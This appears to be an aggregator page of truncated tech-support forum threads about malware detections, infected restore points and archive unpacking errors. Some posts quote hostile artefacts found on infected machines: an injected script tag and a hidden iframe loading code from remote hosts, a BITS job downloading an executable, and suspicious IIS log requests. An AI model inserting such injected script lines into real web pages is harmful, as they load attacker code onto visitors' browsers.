Symantec Endpoint Protection pops up " [SID: 23793] HTTP Malicious RMF File detected " but it won't remove it. CPU usage is at 100%; svchost.exe using 90+%. Also gives "Generic Host Process for Win32 Services has encountered a problem and needs to close." after it sits idle for a while.

System restore did not resolve the problem. Malware Bytes Anti-Malware found two objects (probably unrelated) and removed them, but the problem persists. ComboFix didn't solve the problem either.

I know Symantec sucks but I work remotely and my company's VPN host-checker requires this exact version. I also just read that you don't recommend ComboFix but I didn't know that when I ran it, and it had worked for me one time a year or so ago when all else failed.

Any help would be greatly appreciated!

A:HTTP Malicious RMF File detected

New notification while sitting idle just now: [SID: 24225] Web Attack: Blackhole Toolkit Website 5 detected

Please help.

3 more replies
Answer Match 47.46%

message I'm getting is as follows
" malicious code found in file c:\system volume information\-restore{CD 53596A-5812-49DB-AF84-A72B9BECDE4F}\RP851\A0082311.oll.Infection:Trojan Downloader.Win32.zlob.meq
Action Failed.....

I have gone into my C drive. If I try to go into Windows Explorer from Start, Programs, Accessories, Windows Explorer, I am brought to my documents folder; Explorer will not open. I have tried all I know how to with no luck in finding the file and removing it. It doesn't show up when I run a system scan with my virus scan either. Any suggestions would be greatly appreciated.

also, my system restore will no longer work, if I try to restore to a different time it goes through all the steps but then tells me that the restore could not be completed and no changes were made......help please
vampire265

A:Malicious Code Found In File

The infected RP***\A00*****.exe file(s) is in the System Volume Information Folder (SVI) which is a part of System Restore. This is the feature that allows you to set points in time to roll back your computer to a clean working state. The SVI folder is protected by permissions that only allow the system to have access and is hidden by default unless you have reconfigured Windows to show it. System Restore will back up the good as well as the bad files so when malware is present on the system it gets included in any restore points as an A00***** file. When you scan your system with anti-virus or anti-malware tools, you may receive an alert or notification that a virus was found in the SVI folder (System Restore points) but the anti-virus software was unable to remove it. Since the SVI folder is a protected directory, most scanning tools cannot access it to disinfect or delete these files. If not removed, they sometimes can reinfect your system if you accidentally use an old restore point.
To remove these file(s), the easiest thing to do is Create a New Restore Point to enable your computer to "roll-back" to a clean working state and use Disk Cleanup to remove all but the most recent restore point.
However, since System Restore is not working, you need to get that fixed.
If System Restore is not working, check to make sure it is started and set to automatic.
Go to Start > Run and type: services.msc
Locate the System Restore Service and double-click it. Click the &q... Read more

7 more replies
Answer Match 47.46%

I am building a heuristic engine as a hobby. What is the fastest way to check if a file is malware? What functions to detect? Now I am using writeProcessMemory, SetWindowsHookEx, CreateToolhelp32Snapshot, OutputDebugString, OpenMutex; that is for the start. How can I improve it? Regards
 

A:What to check in file if it has malicious behaviour?

Check this out http://malwaretips.com/forums/malware-analysis-reports-help-and-questions.140/
 

2 more replies
Answer Match 47.46%

Last night at exactly 11PM PST two servers started writing out a large number of IIS logs to HTTPERR. Logging in to the server, a hidden iexplorer.exe would run and consume one CPU core, generating the following errors:
 
2013-02-25 07:23:31 127.0.0.1 1907 127.0.0.1 80 HTTP/1.0 GET /MicrosoftUpdate/ShellEX/KB48342708/default.aspx?tmp=YWZmaW5pdHllbWFpbA== 400 - BadRequest –
 
This ONLY brings up three google results ("MicrosoftUpdate/ShellEX") from sophos.com.
 
This would create multiple 1MB log files per minute. Killing the hidden IE session, nothing additional would come back on its own. I found in the Run registry key there was a string value named "mcupdate" that called c:\windows\system32\update.exe, a 40960 byte file. Running this file would make iexporer.exe open back up hidden and begin throwing errors once more. The date modified and create dates on both servers are from November 2011. Since nothing we have could detect update.exe as malicious, I submitted it to multiple online sites and none come back saying that the file is malicious. I can see in Process Monitor that it appears to be as the program then run tries to
 
With sophos installed (since they appeared to know something about the malware) and the file run in a virtual environment (it doesn't actually launch IE and generate errors here), process monitor shows update.exe writing to C:\Program Files\Sophos\Sophos Anti-Virus\SOPHOS_DETOURED.DLL. It did not do anything like this before ... Read more

More replies
Answer Match 47.46%

I noticed a command prompt running, it only stayed for a couple seconds before closing, in this time I checked task manager to see what it was - "bitsadmin.exe"

I checked Google and found a bit of info on this, it's how Microsoft distributes updates or whatnot.

I checked the Event Viewer and found these logs:

Code:
The BITS service created a new job: amijob, with owner PC\doko

BITS started the amijob transfer job that is associated with the hxxp://d17xr4aw9ok0me.cloudfront.net/Updater.exe URL.
(Changed http to hxxp as advised in the instructions topic)

The transfer job is complete.
User: PC\doko
Transfer job: amijob
Job ID: {bf7ab4ef-6ee1-485b-877c-e222c5a434c8}
Owner: PC\doko
File count: 1
I downloaded that Updater.exe file on a virtual machine to check it out, when executing it, it just closes again - not sure what it does and I'm not sure whether it's malicious.

I checked it with Virus Total:
https://www.virustotal.com/en/file/6...221b/analysis/

The only result is from Bkav with "HW32.Packed.980B", I can't find any information about this result on Google.

A:Malicious file downloaded through bitsadmin.exe ?

My dds.txt contained the following:

=============== Created Last 30 ================
.
2014-12-21 17:49:06 -------- d-----w- C:\Users\doko\AppData\Local\14524
Inside that folder is where the Updater.exe downloaded itself to, along with a 'status.cfg' file which doesn't contain anything and a 'Updater.xml' file which contains:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<comp>
<scr xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="bin.base64">IA==</scr>
<name>DownloadManager</name>
<tp xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</tp>
<tu xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</tu>
<sv xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</sv>
<ti xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</ti>
<icp>campid=10526;</icp>
</comp>
<comp>
<scr xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="bin.base64">IA==</scr>
<name>updater</name>
<tp xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</tp>
<tu xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0... Read more

3 more replies
Answer Match 47.46%

I have the updated Kaspersky 2009 on my Windows XP SP2 and the scan is not able to detect the malicious JavaScript code which is exploiting my browsers. Sometimes websites do not load or give me a strange error.
Upon looking at the source code, I found this malicious code:

Code:
<script language="javascript" SRC="http://do.qwertyy.cn/do.js"></script>
<iframe src="http://hosttracker.net/?click=22235703" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
This code has been inserted on all my browsers and websites and is giving me sleepless nights.
I also tried deleting cookies every time, but nothing works :-(
I also own a few websites, where I am in the random process of uploading and downloading files through FTP; because of this virus, all my websites are also affected.
I have been searching a lot on the internet for a way to eliminate this virus, but in vain.
Could you please help me out with what I can do to be safe?
 

More replies
Answer Match 47.04%

How do I unpack, but not install, SoftPaqs?

A:FAQ(23): Unpacking downloaded SoftPaqs

You can unpack a SoftPaq by running it with a few command line switches. To do this, open a Windows command box and refer to the following information:
Unpacking a SoftPaq file
Sp#####.exe -pdf -f<path> -s
Where
SP####.exe is the Softpaq to unpack.
-pdf is a run time switch that overrides the build parameters.
-f<Path> is a run time switch that overrides the default path set at build time.
-s instructs the package to unpack in silent mode skipping the welcome, license and directory screens.
EXAMPLE:
At the command box prompt (with Administrator rights to prevent access issues) go to the directory where the SoftPaq is and type the following:
sp59909.exe -pdf -fC:\SWSetup\sp59909 -s

3 more replies
Answer Match 47.04%

I have just replaced my old desktop for a new one that comes with windows 7 64 bit. But not sure why ever since I started using the new desktop to unpack rars and especially rars with parts, both winrar and 7zip often have error messages like:

"Packed data CRC failed"
"The volume is corrupted"
"The file is corrupted"
etc.

For example, one of my family member who lives in Ireland wants to send me a bunch of videos and photos taken from a trip they went. He packed these bunch of files into three part rars and uploaded onto a file hosting website and so I have to download each one of them. I first tried jdownloader and downloaded them but couldn't unzip it. Then I tried to download in the normal way using firefox but still couldn't unpack. And I started to think is the pack corrupted?

But then I tried to use my netbook (with Win7 32 bit Starter OS) and downloaded the files through this computer, and it unpacked smoothly without a hassle. I then tried to copy the files I had downloaded using my new desktop to my netbook and tried to unpack them there, but again it says the file is corrupted. That means somehow it's not WinRAR's or 7zip's problem but the way my new computer writes the files onto the hard disk creates corrupted files?

So what's wrong with my new computer? Even my old desktop won't have these problems. Is it because of the 32 64 bit difference? Perhaps my Ireland cousin packed the files with winrar 32 bit and i used 64 bit didn't work? Or ... Read more

A:Weird when unpacking rars

WinRAR can be installed in both 32-bit and 64-bit versions. Have you installed the correct version for your system?

6 more replies
Answer Match 47.04%

Whenever I download a large archive, whether it's 7z, RAR format or some bin format (that's unpacked via provided installer), I always have problems unpacking.

What happens is that, while extracting, I receive errors about some files that are corrupted and cannot be extracted. The FUNNY thing is, if I try to extract the same archive again it says some other file is corrupted, while the one that was "corrupted" on my first try now extracts properly. I don't know how that is even possible.

1) I know that the archives I download/get from friends are not corrupted, and I can trust those sources.
2) I've tried basically everything, like re-downloading, trying with numerous attempts, and updating the software I use (7z, Win RAR, or Daemon tools for those bin archives I mentioned).

Any help? Thanks,
VAO

A:I ALWAYS have problems unpacking files. Any help?

I'm wondering if your hard drive has some bad sectors. You might run a disk check program to see. Your drive manufacturer will probably have one.

7 more replies
Answer Match 46.62%

Hi.
 
I run a Windows 8 Core i3 64-bit machine (Windows Experience Index is 5.6).
 
For a couple of weeks since I installed it, MalwareBytes keeps blocking malicious websites continuously. It is scary because even when the computer is idle and there's no internet activity, MalwareBytes shows messages of blocking access to malicious websites. I have no clue where this activity is coming from. Please help! Am I infected? The computer's been running decently but I am still scared. Along with MalwareBytes, I use Windows Defender as my main antivirus.
 
Do let me know if any other information is needed.

A:MalwareBytes blocks malicious website when computer is idle. Am I infected?

Malwarebytes Anti-Malware Malicious Website Blocking (IP Protection) is part of the Protection Module in the Pro version and works after it is enabled. When attempting to go to a potential malicious website, Malwarebytes will block the attempt and provide an alert. Notification that an IP address has been blocked does not necessarily mean the computer is infected. Some legitimate programs on your computer (i.e. iTunes, Instant Messenger client, P2P programs, web browsers) have access to the Internet and that action can trigger an IP alert if it tried to access a malicious IP address. These types of events are stored in the "protection-log". Your firewall should be able to give you a list of such programs so you can confirm if they are legitimate.
IP Protection is also designed to block incoming connections it determines to be malicious. Botnets and Zombie computers scour the net, randomly scanning a block of IP addresses, searching for vulnerable ports - commonly probed ports and make repeated attempts to access them. Hackers use "port scanning", a popular reconnaissance technique, to search for vulnerable computers with open ports using IP addresses or a group of random IP address ranges so they can break in and install malicious programs. Malwarebytes is doing its job by blocking this kind of traffic and alerting you about these intrusion attempts which it stores in the "protection-log".
More information about IP Protection can be found in the Malwarebytes Anti-Malware Malici... Read more

17 more replies
Answer Match 46.62%

A new PNG buffer overflow vulnerability has surfaced ... While this is most likely proof-of-concept, untrusted PNG formats should not be used in Photoshop until this issue is patched.
Adobe Products PNG.8BI PNG File Handling Buffer Overflow
http://secunia.com/advisories/25044/
Marsu has discovered a vulnerability in various Adobe Products, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the PNG.8BI Photoshop Format Plugin when handling PNG files. This can be exploited to cause a stack-based buffer overflow via a specially crafted PNG file. Successful exploitation allows execution of arbitrary code.
The vulnerability is confirmed in Adobe Photoshop CS2 and Adobe Photoshop Elements (Editor) version 5.0 for Windows and reportedly affects Adobe Photoshop CS3.

A:Adobe Photoshop - New Malicious Png File Vulnerabi

Buffer Overflows In Adobe Products

1 more replies
Answer Match 46.62%

C:\Program Files(x86)\Skype\toolbars\Skypetoolbars.msi|>fileIeaddonIconIco. B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

C:\Program Files(x86)\Skype\toolbars\Skypetoolbars.msi|>fileIeaddonIconIcox64. B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

C:\Windows\Installer\1078F.msi|>FileIeaddonIconIco.B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

C:\Windows\Installer\1078F.msi|>FileIeaddonIconIcox64.B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

These 4 Show up during the scan, are these anything to worry about?

A:Is this a malicious file that keeps showing up in avast bootscan?

Let me put it this way. If the anti virus I trusted kept showing these things as unwanted they would be gone. You can Google them and make a decision.
To help make a decision you could use this.
Windows Defender Offline

7 more replies
Answer Match 46.62%

Hello all. My Internet Explorer has shut down displaying an error in the wscmp.dll file. I did an online search and have found that this is a sign of malicious files. I also keep receiving a message stating that...

"This system is shutting down. Please save all work in progress and log off. Any unsaved changes will be lost. This shutdown was initiated by NT AUTHORITY\SYSTEM."

It has a :60 timer and shuts down after the time has elapsed. I am not sure if the two are related.

I have tried to run the latest malware fix tool from Microsoft, but the tool shuts down on the same file every time and the scan is not completed. This occurs even in Safe Mode.

Also, winupdate.exe and ieupdates.exe encounter an error when windows starts. Upon research I have found these are bad .exe files and I would very much like to get rid of them. Any help on any of these problems would be greatly appreciated. Thanks.


A:malicious .dll file found -- wscmp.dll -- Looking for help on a fix. Log in thread.

16 more replies
Answer Match 46.2%

Switched my web browser yesterday to MSNBC. Get an error message while in there "error while unpacking program, Code 2 Please report to author????????

More replies
Answer Match 46.2%

My problem is that if you want to unpack an exe file, could be a setup exe, then it will save the data in the temp folder (Windows drive), and my problem is that I made a patision (or however to spell that in English..) so I got 10 GB for Windows, so if my Windows ****s up I will be able to just reinstall without worrying too much about my files. (Programs like Registry Mechanic will often solve the registry prob.) Anyways, this means I don't have enough space on my C drive, as I should have given it more ofc.. Should have given it 15 instead, as my programs are on that drive as well... anyways! That's not the matter.. the matter is that when some exe files want to extract, they want to extract huge amounts of software before installing, I'm talking about 1,3 GB + here, and I can't get that much space without deleting half of my programs or so.. So what I want to know is, is there a way to manually unpack an exe file? Or is there a way to change its unpacking destination, so it won't save in temp.. thanks for all upcoming answers.

- Hans, Denmark.

A:Hard times unpacking exe files.

Change the place where it unpacks to the other partition you have for files, programs etc. This should be on the extraction wizard.

2 more replies
Answer Match 46.2%

Hello, when I visit a website that has a video, my Avira antivirus gives me the following notification:
Virus or unwanted program 'HTML/Malicious.Flash.Gen [virus]' detected in file 'C:\Windows\temp\0000000E-E6DED9FD. Action performed: Deny access
my computer usually freezes up and is very slow for several seconds or until I x out of the page. The file in C drive it gives is different each time it gives the virus notification. I have run the following scans:
 
Avira, SUPERAntiSpyware, Malwarebytes, Lavasoft Ad-Aware, Spybot S&D, ComboFix, and others and I have uninstalled all Java and Flash Player programs and then reinstalled.
 
but nothing helps. Can anyone give me a hand? Here are the DDS scan results:
 

A:HTML/Malicious.Flash.Gen [virus]' detected in file 'C:

Does no replies mean no one knows how to fix this issue?

3 more replies
Answer Match 46.2%

Hello, when I visit a website that has a video, my Avira antivirus gives me the following notification:
Virus or unwanted program 'HTML/Malicious.Flash.Gen [virus]' detected in file 'C:\Windows\temp\0000000E-E6DED9FD. Action performed: Deny access
My computer usually freezes up and is very slow for several seconds or until I X out of the page. The file on the C drive it gives is different each time it gives the virus notification. I have run the following scans:
 
Avira, SUPERAntiSpyware, Malwarebytes, Lavasoft Ad-Aware, ComboFix, and I have uninstalled all Java and Flash Player programs and then reinstalled,
 
but nothing helps. Can anyone give me a hand?

A:HTML/Malicious.Flash.Gen [virus]' detected in file...

Hello Jim, be careful running Combo.

Empty your temp folders using TFC (Temporary File Cleaner)
Please download TFC by Old Timer and save it to your desktop.
alternate download link
Save any unsaved work. (TFC will close ALL open programs including your browser!)
Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)
Click the Start button to begin the cleaning process and let it run uninterrupted to completion.
Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.

Last run ESET.
Hold down Control and click on this link to open ESET OnlineScan in a new window.
Click the button.
For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
Double click on the icon on your desktop.
Check "YES, I accept the Terms of Use."
Click the Start button.
Accept any security warnings from your browser.
Under scan settings, check "Scan Archives" and "Remove found threats"
Click Advanced settings and select the following:
Scan potentially unwanted applications
Scan for potentially unsafe applications
Enable Anti-Stealth technology
ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
When the scan...

3 more replies

Morning Guys,
 
I have an old fully functioning notebook which is currently running the Windows XP Home Edition (2002). The notebook is still in working condition and I've recently decided to upgrade its RAM and OS.
However, a few days ago it was infected with a malicious virus which I'm certain is NOT in the OS but in the Master Boot Record. Reasons for deciding so include:
 
1. I've run everything under the sun and there's no detection;
2. Internet connection is on in the system tray, but I'm barred from accessing any sites regardless of which browser I use (only page it allows is the Microsoft page - the start up page on IE8);
3. I've uninstalled some programmes (Firefox and Avast), but they are still present in the laptop;
4. My address bar in windows explorer is hidden even after I've put a tick to show it;
5. Every time immediately after I clicked on Shut down, my USB antivirus Real Time Protection notification bubble appears.
 
I am no expert when it comes to removing viruses, but I've been online searching for possible ways to remove this horror as I would like to upgrade my laptop to a newer OS. Even my USB is infected - the virus completely wiped out its content and planted itself in an invisible System Volume Information folder, which also denies access to anyone or anything that tries to remove it.
 
I really need some advice / help on getting rid of this. Obviously, I cannot download any software or use the USB ports. The only alternative is the...

A:Master Boot Record Infected with Malicious Virus - Windows XP Home Edition

Since you are planning to upgrade to Windows 7......that would eliminate any malware on the hdd during formatting and installing 7.
If you suspect flash drives or other external drives are infected, be sure none are connected to the computer.
 
Another choice is using a Linux distro such as Ubuntu which is free.
If you want to explore using a Linux distro.....view topics in BC's Linux Forum or start your own there.

4 more replies

First, thank you for taking the time to look at and help solve my problem.

My sister was using my computer and she explained that she was browsing a website and the antivirus software began to display warnings and the computer suddenly rebooted. When I took a look at it myself, it was slower than usual upon booting, and I immediately began to get malicious software warnings from Avast. There were malicious URL warnings and malicious file warnings and then the computer blue screened (I didn't get the error code from the blue screen because it closed too fast) and rebooted. I ran a scan in safe mode with Avast and Malwarebytes and they both found viruses. I scanned with Avast first and got these:
Avast scan results:

Filename: iyniiuda.dll - Threat: Win32:Sefnit-GS [Drp]

Filename: fprpbuai.dll - Threat: Win32:Sefnit-GT [Drp]

Filename: esevpji.dll - Threat: Win32:Sefnit-GS [Drp]

Filename: iyniiuda.dll - Threat: Win32:Sefnit-GS [Drp]

Filename: fprpbuai.dll - Threat: Win32:Sefnit-GT [Drp]

Filename: tzsfv.dll - Threat: Win32:Sefnit-GT [Drp]

Filename: partner[1].htm - Threat: HTML:RedirME-inf [Trj]

Filename: impressions[1].htm - Threat: HTML:RedirME-inf [Trj]


Malwarebytes found both of these:

Memory Processes Detected: 1
C:\Windows\svchost.exe (Trojan.Agent) -> 3744 -> Delete on reboot.

Files Detected: 1
C:\Windows\svchost.exe (Trojan.Agent) -> Delete on reboot.


After the scans, I tried moving the files to the chest (quarantine) ...

A:Infected with unknown virus. Avast detects malicious URL & Windows blue screens

Greetings and Welcome to The Forums!!
My name is Gringo and I'll be glad to help you with your computer problems. I have put together some things for you to keep in mind while I am helping you to make things go easier and faster for both of us.

Please do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.

Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.

Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.

NOTE: At...

3 more replies

I changed my OS to Win 7 64-bit. I'm trying to install Microsoft 2010 Office 64-bit from an online link. It downloaded and goes to unpack when I get an error while it's checking CRC. It stops and the error says insufficient disk space or errors on disk. I have 80 GB free on my drive, and I cleaned the disk from previous installs. Stuck?? Please help

A:online install error in unpacking download while checking crc

Downloaded from what online link?

The last I heard, 32-bit was the recommended version even for 64-bit systems?

Choose the 32-bit or 64-bit version of Office - Word - Office.com

2 more replies

Error while unpacking program, code LP5. Please report to author.

A:Error while unpacking program, code LP5. Please report to author.

You are going to have to provide a lot more detail in order for anyone to be able to answer your question. Please include as much information as you can in your posts.

2 more replies

How do I stop this message from coming up on my computer all the time?

Error while unpacking program, code 2. Please report to author.

A:Error while unpacking program, code 2. Please report to author.

Was there a reply posted?


2 more replies

This help request might fit in alternate discussion threads, but this seems like the most logical place to post... these could be 2 separate issues, but it feels like they are connected to me.

Problem:
A - Unpacking any RAR, Zip, 7z, etc. file - particularly large ones - results in CRC or other unpacking errors 90% of the time. Sometimes a simple retry works, sometimes re-downloading the compressed file works.. sometimes nothing works. Anything over 1GB is almost sure to fail miserably every time (often fails on different files within the package).
(This occurs using WinZip, WinRAR, 7-Zip.)

B - Multiple game client crashes - Oblivion, various MMORPGs (WoW, LOTRO, many others) crash constantly.. if the computer doesn't freeze or blue screen, the error is 100% the client .exe file .. it doesn't happen just on strenuous load sequences or 'laggy' areas.. it can just happen sitting in the middle of an unpopulated area.. varies once per 1-5 hrs.. rarely goes 3 gameplay attempts without at least 1 crash.

Both errors have occurred pretty consistently over the last 3 years.. I give up on some games that have more crashes than others.. and give up on some because I can never even unpack the game to play it.

Original System: Dell XPS 600 Purchased October 2005 .. problems started right away - but I just ignored most of them until after warranty

Hardware Replaced:
Video Card (6 mos ago).. was Nvidia 7800 GTX, now Nvidia 8600 I believe..
Hard Drive (3 mos ago) - was Maxtor...

A:Constant Unpacking Errors and Game Client Crashes

Sorry - I hate bumping - but posted this late last night - figure there are more people on the forums now that hopefully have some advice!

Thanks

4 more replies

The captioned message appears whenever I try to update my antispyware application, so preventing it. When I stopped the firewall and ran sfc /scannow and corrected 3 or 4 system files, it did open, but no more after reopening the firewall.

A:Error while unpacking program, code 2. Please report to author.

You may have other spyware issues. First you can disable the firewall. If the spyware program opens then it has its own firewall that conflicts with Windows. You should also download CCleaner, delete temp files, and run Registry Cleaner too. Then download Malwarebytes, run a full scan and delete nasties.

9 more replies

Hi guys, I have just recently upgraded my computer from Windows XP to Windows 7, but since then I haven't been able to install most games.

During installation, each game has a different error message but generally, the problem seems to lie in games that require unpacking large files, such as *.bin. For example, while trying to install Assassin's Creed 3, this message appeared:

An error occurred while unpacking: archive corrupted! Unarc.dll returned an error code: -7. ERROR: archive data corrupted(decompression failed)

or

Decompression failed with error code: -12. Bad CRC in the archive data0.bin

Please help me, I'm going mad.

Computer's spec:

OS: Windows 7 Ultimate 64-bit (6.1, Build 7600)
Processor: Intel Core i5 CPU 750 @ 2.67GHz (4CPUs)
RAM: Elixir DDRam 3 2GB x2
GPU: ATI Radeon HD 4800 Series
DirectX 11
Motherboard: ASUS P7P55D
BIOS: 9/24/9 Ver: 08.00.15

What I've tried so far:

Updated drivers of graphic card, mainboard, etc.
Ran as Administrator.
Installed in safe mode.
Tried installing these games in another computer (everything's fine)
Reinstalled Windows 7.
Formatted entire HDD, reinstalled Windows XP (now even Windows XP has this problem)
Bought a new HDD

 

A:Cannot install softwares which require unpacking large files

What site are you downloading these from?
 

3 more replies

While on the internet today, my internet security program  advised me that it had blocked a potential web attack: Malicious File Download Attack 24.  Looking at the log files in Norton, I can see the severity of the attack, but it says no action is required for Recommendation of action.  While doing a little research on my own, I can see that doesn't always mean something didn't find its way on my machine. It just happened, so there are no obvious signs of abnormal system performance going on.  How can I be sure?  Also, I've read through several fixes of similar issues on here where the user was advised to run ComboFix under the guidance of a technical adviser.  I would like to do the same.
 
System info:
 
Older XP machine with up to date patches and SP3
Running Norton Internet Security version 21.7.0.11 (up to date)
Running concurrently Malwarebytes version 2.1.8.1057 (up to date)
 
I've attached a screenshot of the potential intrusion, found in the NIS log file
 
Thank you so kindly,
 
Brian

A:Norton Internet Security prompted it block a Malicious File Download 24.

Hi there, my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My first language is not English. So please do not use slang or idioms. It could be hard for me to read.
Thanks for your understanding.

Scan with FRST in normal mode
Please download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)
Run FRST. Don't change one of the checkboxes and hit Scan.
Logfiles are created on your desk...

2 more replies

As everyone knows, the condition of a computer will deteriorate over time.
Unfortunately, since I've had the internet working on my computer, my computer has been getting slower and slower until now. It takes approx. 20 seconds - 1 minute to get from Windows Logon to the Explorer Shell, and about another 5 - 10 minutes fully loading. Internet Explorer crashes every time I exit, and every app I have will frequently hang for a few seconds to a few hours.

HijackThis log as follows.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 21:10:11, on 16/12/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal


More replies

I have got a malicious file on my D drive, can't delete it, and antivirus does not count it as a virus.
I tried deleting it but "access denied",
so I want to know if I can delete that file without using any antivirus.
I have also installed Ubuntu, which deletes the file temporarily; on restarting, ".trash=100" is again in the same place.
Techies..... I hate these files, I'm not in the mood to format my PC.

A:want to delete a malicious file ".trash-1000" from my pc.

I don't think they are viruses, buddy; simply system folders.

8 more replies

First of all, hello to you all.

As the thread title may allude, I am a little disgruntled at my first attempt to install my brand new genuine Windows 7 x64 Home Premium OEM.

After the first 4 attempts at installing Win7 I managed to get around the installer asking for 'unknown device driver' by unplugging my card reader. I have been running XP x64 OEM for some time and have re-installed it at least 5 times and have never had any problems whatsoever; if only the same were true for Win7!

Having done some research it became clear that Win7 should take no more than 30-40 minutes to install; but here I am 23hrs later and it STILL hasn't even started installing yet; it's still 'unpacking windows files' @ 99%...

Has anyone else had this problem? If so, what did you do to fix it?

Thanks in advance

A:23hrs - "unpacking windows files"

Welcome to Seven Forums.

Nice job on the system specs.

Sorry you're having problems.
How long has it been at 99%?

We've made a list of questions which are the result of reoccurring incidents seen so far.
If you can have a look at these and give us your answers we'll be able to give you better suggestions.

Questions to use for help with Installation Issues

We have also seen people with AMD mother boards having these problems, try taking out all memory cards except one, if that doesn't work then move the memory card to a different slot and try again.

Do you have HyperTransport function settings in your BIOS?
There are two options in the BIOS Setup called K8 -- KN HT Speed and K8 -- KN HT Width, both are normally set as Auto. Change them to K8 -- KN HT Speed to 1x and K8 <-> KN HT Width to 8 8. You can change them back after the install.

If this doesn't work, then reply with more details and we'll try again.
EDIT:
Just read a thread where a guy with an AMD board was having similar problems said he turned off 'Cool 'n Quiet' setting (the feature that turns down the fan RPM). He also found a bad RAM stick by running memtest86+. After that Win7 installed with no problem. Might be worth a try.

4 more replies

Hi,
I have a Dell Inspiron E1405 with Win XP SP3. For the last 15 days I have been infected with rootkit-agent.sys and tried every malware/antivirus/spyware tool suggested by "am i affected forum". Since the rootkit could not be fixed, I was advised to visit the HJT forum. Need help.
I keep getting a rootkit detected message from my AVG.
I am pasting DDS below and also attaching the "attach" file.
Request your attention.
Regards
g10

**************

DDS (Ver_09-06-26.01) - NTFSx86
Run by first at 22:50:06.40 on Thu 07/23/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.372 [GMT 5.5:30]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}


A:infected with rootkit-agent.di ndis.sys file is infected

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll...

11 more replies

Please review steps already taken here:

http://www.bleepingcomputer.com/forums/topic435318.html/page__gopid__2531767#entry2531767

DDS results:
.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 1.6.0_30
Run by HP at 23:13:02 on 2011-12-31
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8174.5429 [GMT -5:00]
.
AV: Norton Internet Security *Enabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Internet Security *Enabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Norton Internet Security *Enabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
.

A:Infected MBR - Norton power eraser says rikvm_C6F09094.sys is a bad file but the file remains and never gets fixed

Hello and welcome to Bleeping Computer

